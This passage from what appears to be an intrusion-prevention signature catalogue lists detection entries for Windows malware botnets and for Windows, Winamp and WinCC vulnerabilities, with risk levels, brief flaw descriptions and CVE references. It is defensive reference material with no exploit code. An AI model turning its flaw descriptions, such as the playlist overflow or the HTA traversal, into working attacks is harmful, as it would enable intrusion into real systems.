Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Adware.WebCake is an adware that targets Windows hosts. It displays pop-up advertisements on the affected machine.
Situation: HTTP_CRL-WebCake-2-Traffic
HTTP_CSH-WebCake-Traffic
Back to top

Win32.Backdoor.Alusins.A-Botnet

About this vulnerability: Win32.Backdoor.Alusins.A botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Backdoor.Alusins.A is a spyware that targets Windows hosts. The malware can be used to steal the user's personal information.
Situation: Generic_CS-Alusins.A-Traffic
Back to top

Win32.Backdoor.Bifrose.IQ-Botnet

About this vulnerability: Win32.Backdoor.Bifrose.IQ botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Backdoor.Bifrose.IQ is a malware that targets Windows hosts. It can be used to open a backdoor on the infected machine.
Situation: HTTP_CSU-Bifrose.IQ-Traffic
Back to top

Win32.Backdoor.Golbrnd.A-Botnet

About this vulnerability: Win32.Backdoor.Golbrnd.A botnet
Risk: High
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Backdoor.Golbrnd.A is a ransomware that targets Windows hosts.
Situation: HTTP_CSU-Golbrnd.A-Traffic
Back to top

Win32.Backdoor.Heloag-Botnet

About this vulnerability: Win32.Backdoor.Heloag botnet
Risk: High
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Backdoor.Heloag is a malware that targets Windows hosts. It can be used remotely access the infected host.
Situation: HTTP_CRL_Heloag.A-Traffic
Back to top

Win32.Backdoor.Hupigon-Botnet

About this vulnerability: Win32.Backdoor.Hupigon botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Backdoor.Hupigon is a malware that targets Windows hosts. A remote attacker can use the malware to take remote control of the affected machine.
Situation: Generic_CS-Hupigon.FI-Traffic
HTTP_CSH-Hupigon.AIPM-Traffic
Back to top

Win32.Backdoor.Pontoeb.A-Botnet

About this vulnerability: Win32.Backdoor.Pontoeb.A botnet
Risk: High
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Backdoor.Pontoeb.A is a malware that targets Windows hosts. It can be used to install additional unwanted files on the affected machine.
Situation: HTTP_CRL-Pontoeb.A-Traffic
Back to top

Win32.BankingTrojan.Torpplar.A-Botnet

About this vulnerability: Win32.BankingTrojan.Torpplar.A botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.BankingTrojan.Torpplar.A is a malware that targets Windows hosts. It is used to steal credentials and payment information from the affected machine.
Situation: HTTP_CRL-Torpplar.A-Traffic
Back to top

Win32.Downloader.Loadmoney-Botnet

About this vulnerability: Win32.Downloader.Loadmoney botnet
Risk: High
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Downloader.Loadmoney is a malware that targets Windows hosts. It can be used to download additional unwanted files on the affected machine.
Situation: HTTP_CRL-Loadmoney-Traffic
Back to top

Win32.Downloader.Malat-Botnet

About this vulnerability: Win32.Downloader.Malat botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Downloader.Malat is a malware that targets Windows hosts.
Situation: HTTP_CSU-Malat-Traffic
Back to top

Win32.Downloader.Microjoin.gen_C-Botnet

About this vulnerability: Win32.Downloader.Microjoin.gen_C botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Downloader.Microjoin.gen_C is a malware that targets Windows hosts. It is used to download additional malware on the affected machine.
Situation: HTTP_CRL-Microjoin.gen_C-Traffic
File-Exe_Microjoin.gen_C-Download
Back to top

Win32.Downloader.Multidropper-Botnet

About this vulnerability: Win32.Downloader.Multidropper botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Downloader.Multidropper is a malware that targets Windows hosts. It is used to download additional malicious programs on the affected machine.
Situation: E-Mail_Multidropper-Traffic
Back to top

Win32.Downloader.Pabueri.A-Botnet

About this vulnerability: Win32.Downloader.Pabueri.A botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Downloader.Pabueri.A is a malware that targets Windows hosts. It can be used to download additional malicious files on the affected machine.
Situation: Generic_CS-Pabueri.A-Traffic
Back to top

Win32.Downloader.Skyflas.A-Botnet

About this vulnerability: Win32.Downloader.Skyflas.A botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Downloader.Skyflas.A is a malware that targets Windows hosts. It can be used to download additional unwanted files on the affected machine.
Situation: File-GIF_Skyflas.A-Traffic
Back to top

Win32.Downloader.Tijcont.A-Botnet

About this vulnerability: Win32.Downloader.Tijcont.A botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Downloader.Tijcont.A is a malware that targets Windows hosts. It can be used to download additional malicious programs on the infected machine.
Situation: HTTP_CSH-Tijcont.A-Traffic
Back to top

Win32.PasswordStealer.Fareit-4-Botnet

About this vulnerability: Win32.PasswordStealer.Fareit-4 botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.PasswordStealer.Fareit-4 is a malware that targets Windows hosts. It is used to steal user credentials.
Situation: HTTP_CSH-Fareit-4-Traffic
Back to top

Win32.PasswordStealer.Mantal.A-Botnet

About this vulnerability: Win32.PasswordStealer.Mantal.A botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.PasswordStealer.Mantal.A is a malware that targets Windows hosts. The malware is used to steal the user's personal information.
Situation: HTTP_CRL-Mantal.A-Traffic
Back to top

Win32.ScareWare.CryptKeeper-Botnet

About this vulnerability: Win32.ScareWare.CryptKeeper botnet
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.ScareWare.CryptKeeper is a malware that targets Windows hosts. It locks the computer and asks for money to decrypt the data.
Situation: HTTP_CRL_CryptKeeper.A-Traffic
Back to top

Win32.ScareWare.Ransom.KC-Botnet

About this vulnerability: Win32.ScareWare.Ransom.KC botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.ScareWare.Ransom.KC is a malware that targets Windows hosts.
Situation: HTTP_CRL-Ransom.KC-Traffic
Back to top

Win32.Spyware.Ranbyus.G-Botnet

About this vulnerability: Win32.Spyware.Ranbyus.G botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Spyware.Ranbyus.G is a spyware that targets Windows hosts. The malware can be used to steal the user's personal information.
Situation: HTTP_CS-Ranbyus.G-Traffic
Back to top

Win32.Trojan.Avgesi-Botnet

About this vulnerability: Win32.Trojan.Avgesi botnet
Risk: High
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Avgesi is a malware that targets Windows hosts.
Situation: HTTP_CSH-Avgesi.B-Traffic
Back to top

Win32.Trojan.BadBind-Botnet

About this vulnerability: Win32.Trojan.BadBind botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.BadBind is a malware that targets Windows hosts.
Situation: HTTP_CSH-BadBind.A-Traffic
Back to top

Win32.Trojan.Bumat-rts-Botnet

About this vulnerability: Win32.Trojan.Bumat!rts botnet
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Bumat!rts is a malware that targets Windows hosts.
Situation: HTTP_CRL_Bumat-rts-Traffic
Back to top

Win32.Trojan.Droidpak-Botnet

About this vulnerability: Win32.Trojan.Droidpak botnet
Risk: High
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Droidpak is a malware that targets Windows hosts.
Situation: HTTP_CSH-Droidpak-Traffic
Back to top

Win32.Trojan.Eupuds-Botnet

About this vulnerability: Win32.Trojan.Eupuds botnet
Risk: High
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Eupuds is a malware that targets Windows hosts. It can be used to collect information on the infected machine and send it to a remote server.
Situation: HTTP_CRL_Eupuds.A-Traffic
Back to top

Win32.Trojan.Hanove.F-Botnet

About this vulnerability: Win32.Trojan.Hanove.F botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Hanove.F is a malware that targets Windows hosts. It is used to decrypt and track traffic.
Situation: HTTP_CRL-Hanove.F-Traffic
Back to top

Win32.Trojan.Heur-Botnet

About this vulnerability: Win32.Trojan.Heur botnet
Risk: High
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Heur is an malware that targets Windows hosts.
Situation: HTTP_CRL-Heur.LP-Traffic
Back to top

Win32.Trojan.HeurGeneric-Botnet

About this vulnerability: Win32.Trojan.HeurGeneric botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.HeurGeneric is a malware that targets Windows hosts.
Situation: HTTP_CRL-HeurGeneric-Traffic
Back to top

Win32.Trojan.Injector-2-Botnet

About this vulnerability: Win32.Trojan.Injector-2 botnet
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Injector-2 is a malware that targets Windows hosts. It is used to mask the actions of other malware.
Situation: Generic_CS-Injector-2-Traffic
Back to top

Win32.Trojan.Kovter.B-Botnet

About this vulnerability: Win32.Trojan.Kovter.B botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Kovter.B is a malware that targets Windows hosts. The malware can be used to prevent access to the affected machine.
Situation: HTTP_CRL-Kovter.B-Traffic
Back to top

Win32.Trojan.Lumbko.A-Botnet

About this vulnerability: Win32.Trojan.Lumbko.A botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Lumbko.A is a malware that targets Windows hosts. It can be used to collect information on the infected machine and send it to a remote server.
Situation: HTTP_CRL-Lumbko.A-Traffic
Back to top

Win32.Trojan.Psyme.Gen-Botnet

About this vulnerability: Win32.Trojan.Psyme.Gen botnet
Risk: High
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Psyme.Gen is a malware that targets Windows hosts. It can be used to download additional files on the affected machine.
Situation: HTTP_CRL-Psyme.Gen-Traffic
Back to top

Win32.Trojan.Scar.O-Botnet

About this vulnerability: Win32.Trojan.Scar.O botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Scar.O is a trojan that targets Windows hosts. The malware is controlled from a remote server.
Situation: HTTP_CRL-Scar.O-Traffic
Back to top

Win32.Trojan.SHeur4.BHUE-Botnet

About this vulnerability: Win32.Trojan.SHeur4.BHUE botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.SHeur4.BHUE is a Trojan that targets Windows hosts. The malware can be used to steal the user's personal information and download additional malicious files on the affected machine.
Situation: HTTP_CRL-SHeur4.BHUE-Traffic
Back to top

Win32.Trojan.Simda.bqz-Botnet

About this vulnerability: Win32.Trojan.Simda.bqz botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Simda.bqz is a malware that targets Windows hosts. It can be used to collect information on the infected machine and send it to a remote server.
Situation: HTTP_CRL-Simda.bqz-Traffic
Back to top

Win32.Trojan.Smoaler-Botnet

About this vulnerability: Win32.Trojan.Smoaler botnet
Risk: High
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Smoaler is a trojan that targets Windows hosts. The malware is controlled from a remote server, and it can be used to download and execute additional malicious files on the infected machine.
Situation: HTTP_CRL-Smoaler.C-Traffic
HTTP_CRL-Smoaler.B-Traffic
Back to top

Win32.Trojan.Sydigu-Botnet

About this vulnerability: Win32.Trojan.Sydigu botnet
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Sydigu is a malware that targets Windows hosts. It steals user information from the affected machine and sends it encrypted to a remote server.
Situation: Generic_CS-Sydigu.A-Traffic
Back to top

Win32.Trojan.Tobfy-Botnet

About this vulnerability: Win32.Trojan.Tobfy botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Tobfy is a ransomware that targets Windows hosts.
Situation: HTTP_CRL-Tobfy-Traffic
Back to top

Win32.Trojan.Xorpix.bh-Botnet

About this vulnerability: Win32.Trojan.Xorpix.bh botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Xorpix.bh is a trojan that targets Windows hosts. The malware is controlled from a remote server, and it can be used for example to send spam mail.
Situation: HTTP_CRL-Xorpix.bh-Traffic
Back to top

Win32.Trojan.Zusy.24405-Botnet

About this vulnerability: Win32.Trojan.Zusy.24405 botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Trojan.Zusy.24405 is a malware that targets Windows hosts. The malware can be used to collect private information on the affected machine.
Situation: HTTP_CRL-Zusy.24405-Traffic
Back to top

Win32.Virus.Obfuscator.AJK-Botnet

About this vulnerability: Win32.Virus.Obfuscator.AJK botnet
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Virus.Obfuscator.AJK is a malware that targets Windows hosts.
Situation: HTTP_CRL_Obfuscator.AJK-Traffic
Back to top

Win32.Worm.Mofei.P-Botnet

About this vulnerability: Win32.Worm.Mofei.P botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Worm.Mofei.P is a malware that targets Windows hosts.
Situation: HTTP_CS-Mofei.P-Traffic
Back to top

Win32.Worm.Taterf.B-Botnet

About this vulnerability: Win32.Worm.Taterf.B botnet
Risk: High
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Win32.Worm.Taterf.B is a worm that targets Windows hosts. It can be used to steal personal information.
Situation: HTTP_CSU-Taterf.B-Traffic
Back to top

Win32k-Elevation-of-Privilege-Vulnerability-CVE-2018-8453

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1109-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists an elevation of privilege vulnerability in Microsoft Windows. Successful exploitation of this vulnerability may lead in arbitrary code execution in kernel mode.
Situation: File-Exe_Win32k-Elevation-of-Privilege-Vulnerability-CVE-2018-8453
References:
CVE-2018-8453
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8453
ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct
Back to top

Winace-Rar-And-Tar-Directory-Traversal-Vulnerability

About this vulnerability: A vulnerability in e-Merge WinAce
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: WinAce
Type: Malfunction
Description: There exists a directory traversal vulnerability in the WinACE application. The flaw is caused by improper handling of the path name of archived files in TAR and RAR archives. By persuading a user to open a crafted archive with the affected application, an attacker may place files in arbitrary locations on the target system, which may lead to code execution. Exploitation of this vulnerability will generally result in the creation and/or overwriting of arbitrary files on the target file system. File system access is dependent on the privileges of the currently logged in user. The behaviour of the target system highly depends on the intention of the attacker. If the currently logged in user has permission to overwrite system files, the operating system stability may be affected if critical system files are overwritten.
Situation: File-Binary_Path-Traversal-Via-Tar-Archive
References:
CVE-2006-0981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0981
BID-16800
http://www.securityfocus.com/bid/16800
OSVDB-23464
http://www.osvdb.org/23464
Back to top

Winamp-Id3v2-Tag-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in NullSoft Winamp
Risk: Moderate
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Winamp
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Winamp. The vulnerability is caused due to a boundary error in the handling of ID3v2 tags. A remote attacker can exploit the vulnerability by enticing the victim to add a malicious MP3 file to the playlist and play it. The exploitation of the vulnerability can cause a denial of service or the execution of arbitrary code with privileges of the currently logged in user.
Situation: HTTP_SS-Winamp-Id3v2-Tag-Handling-Buffer-Overflow
File-Binary_Winamp-Id3v2-Tag-Handling-Buffer-Overflow
References:
CVE-2005-2310
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2310
BID-14276
http://www.securityfocus.com/bid/14276
OSVDB-17897
http://www.osvdb.org/17897
Back to top

Winamp-In-CDDA.dll-Buffer-Overflow

About this vulnerability: A vulnerability in Winamp
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Winamp
Type: Buffer Overflow
Description: A vulnerability exists in the way Winamp parses playlist files and CD audio files. If a playlist file contains an overly long reference to a file in CD audio format (with a .cda extension) or a CD audio file has a long filename, a buffer overflow can occur in the component IN_CDDA.dll. An attacker can exploit this vulnerability to execute arbitrary code on a vulnerable system by enticing a user to open a specially crafted playlist file or CD audio file.
Situation: File-TextId_Winamp-In-CDDA.dll-Buffer-Overflow
Back to top

Winamp-Playlist-Buffer-Overflow

About this vulnerability: Winamp .pls playlist buffer overflow
Risk: High
First detected in: sgpkg-ips-57-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Winamp
Type: Buffer Overflow
Description: Winamp player version 5.12 is vulnerable to a playlist buffer overflow. Each filename in a playlist is copied into a fixed-size buffer without checking the actual length of the filename. Using a filename longer than 1024 bytes causes a buffer overflow. Arbitrary remote code execution is possible via the flaw. The Winamp player creates file extension associations for playlist files when installed, so the player automatically opens playlist files when they are downloaded or opened. Internet radio stations may also use playlist files to give listeners the URLs of their servers.
Situation: HTTP_SS-Winamp-Playlist-Buffer-Overflow
File-TextId_Winamp-Playlist-Buffer-Overflow
References:
CVE-2006-0476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0476
BID-16410
http://www.securityfocus.com/bid/16410
OSVDB-22789
http://www.osvdb.org/22789
Back to top

Winamp-XM-File-Heap-Overflow

About this vulnerability: A vulnerability in Winamp
Risk: High
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Winamp
Type: Buffer Overflow
Description: There is a buffer overflow in the .XM file type decoded within Winamp, a popular media file player for the Windows Operating System developed by Nullsoft Corporation. The exploitation of this buffer overflow can lead to the execution of arbitrary code on the remote machine in the context of the user running Winamp.
Situation: File-TextId_Winamp-XM-File-Heap-Overflow
Back to top

WinCC-Hmiload-Exe-Directory-Traversal

About this vulnerability: A vulnerability in Siemens SIMATIC WinCC
Risk: High
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Siemens SIMATIC WinCC
Type: Directory Traversal
Description: There is a directory traversal vulnerability in WinCC, which allows remote code excution.
Situation: Generic_CS-WinCC-Hmiload-Exe-Directory-Traversal
Back to top

WinComLPD-Total-Integer-Overflow

About this vulnerability: WinComLPD Total Integer Overflow
Risk: High
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WinComLPD Total
Type: Integer Overflow
Description: An integer overflow vulnerability in WinComLPD Total 3.0.2.623 which allows attackers to remotly execute arbitrary code.
Situation: Generic_CS-WinComLPD-Total-Integer-Overflow
References:
CVE-2008-5159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5159
BID-27614
http://www.securityfocus.com/bid/27614
OSVDB-42861
http://www.osvdb.org/42861
Back to top

Windfind

About this vulnerability: WindFind
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WindFind
Type: Misconfiguration
Description: WindFind is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Windfind
Back to top

Windows-Command-Prompt

About this vulnerability: Windows command prompt transferred in clear text
Risk: High
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A Windows command prompt was transferred in clear text. This may indicate that a Windows machine has been successfully exploited and a shell connection has been established.
Situation: Shared_CS-Windows-Command-Prompt
Shared_SS-Windows-Command-Prompt
Back to top

Windows-CryptoAPI-Spoofing-Vulnerability-CVE-2022-34689

About this vulnerability: An attempt to exploit a vulnerability in Windows CryptoAPI detected
Risk: High
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: By exploiting this vulnerability in the Windows CryptoAPI, an attacker could manipulate an existing public X.509 certificate to spoof their identity and perform actions such as authentication or code signing as the targeted certificate.
Situation: TLS_SS_Windows-CryptoAPI-Spoofing-Vulnerability-CVE-2022-34689
References:
CVE-2022-34689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34689
Back to top

Windows-Cryptographic-Services-Remote-Code-Execution-CVE-2023-23416

About this vulnerability: A vulnerability in Microsoft Windows Cryptographic Services
Risk: High
First detected in: sgpkg-ips-1565-5242
Last changed: sgpkg-ips-1565-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Windows Cryptographic Services detected.
Situation: File-Binary_Windows-Cryptographic-Services-Remote-Code-Execution-CVE-2023-23416
References:
CVE-2023-23416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23416
ms23-mar
http://technet.microsoft.com/security/bulletin/ms23-mar
Back to top

Windows-Dnsapi-Remote-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in Windows
Risk: High
First detected in: sgpkg-ips-1076-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists an out-of-bounds write vulnerability in Windows DNSAPI. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: DNS-TCP_Windows-Dnsapi-Remote-Code-Execution-Vulnerability
References:
CVE-2018-8225
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8225
ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun
Back to top

Windows-Elevation-Of-Privilege-CVE-2017-0024

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A privilege escalation vulnerability in Microsoft Windows.
Situation: File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0024
References:
CVE-2017-0024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0024
MS17-018
http://technet.microsoft.com/security/bulletin/MS17-018
Back to top

Windows-Elevation-Of-Privilege-CVE-2017-0026

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A privilege escalation vulnerability in Microsoft Windows.
Situation: File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0026
References:
CVE-2017-0026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0026
MS17-018
http://technet.microsoft.com/security/bulletin/MS17-018
Back to top

Windows-Elevation-Of-Privilege-CVE-2017-0050

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A privilege escalation vulnerability in Microsoft Windows.
Situation: File-Binary_Windows-Elevation-Of-Privilege-CVE-2017-0050
References:
CVE-2017-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0050
MS17-017
http://technet.microsoft.com/security/bulletin/MS17-017
Back to top

Windows-Elevation-of-Privilege-Vulnerability-CVE-2016-0040

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: There exists a elevation of privilege vulnerability in Microsoft Windows.
Situation: File-Text_Windows-Elevation-of-Privilege-Vulnerability-CVE-2016-0040
References:
CVE-2016-0040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0040
MS16-014
http://technet.microsoft.com/security/bulletin/MS16-014
Back to top

Windows-Environment-Variables-In-Script

About this vulnerability: Known Windows Environment Variables in website scripts
Risk: Moderate
First detected in: sgpkg-ips-830-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: References to Windows Environment Variables within website scripting may indicate attempts to access the operating system through browser vulnerabilities.
Situation: File-Text_Windows-Environment-Variables-In-Script
Back to top

Windows-Explorer-HTA-CLSID-System-Compromise

About this vulnerability: Windows Explorer HTA CLSID system compromise vulnerability
Risk: Moderate
First detected in: sgpkg-ips-75-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4; Windows XP SP1; Windows XP SP2; Windows 2003
Software: <os>
Type: Directory Traversal
Description: Windows Explorer suffers from a vulnerability where script files can be executed without security restrictions. Files whose extension is a CLSID defined in Windows registry are recognized and executed with a specified program. In the case of HTA files with the CLSID {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} mshta.exe is executed. If the filename contains URI-encoded directory traversal sequences, mshta.exe will normalize it and open a file in a different directory without security restrictions. This allows remote attackers to execute arbitrary code by enticing users to open a malicious file with Windows Explorer, possibly over WebDAV or SMB shares.
Situation: HTTP_CSU-Windows-Explorer-HTA-CLSID-System-Compromise-2
HTTP_CS-Windows-Explorer-HTA-CLSID-System-Compromise
SMB-TCP_Windows-Explorer-HTA-CLSID-System-Compromise
References:
CVE-2006-3281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3281
BID-19389
http://www.securityfocus.com/bid/19389
MS06-045
http://technet.microsoft.com/security/bulletin/MS06-045
Back to top

Windows-Explorer-LNK-Remote-Code-Execution-Vulnerability-CVE-2017-8464

About this vulnerability: A vulnerability in Windows Explorer
Risk: Moderate
First detected in: sgpkg-ips-930-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability in the way Windows Explorer handles LNK files.
Situation: File-Binary_Windows-Explorer-LNK-Remote-Code-Execution-Vulnerability-CVE-2017-8464
References:
CVE-2017-8464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464
ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun
Back to top

Windows-Filename-Parsing-Vulnerability-CVE-2012-4774

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-497-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit vulnerability in Microsoft Windows was detected
Situation: SMB-TCP_Windows-Filename-Parsing-Vulnerability-2
References:
CVE-2012-4774
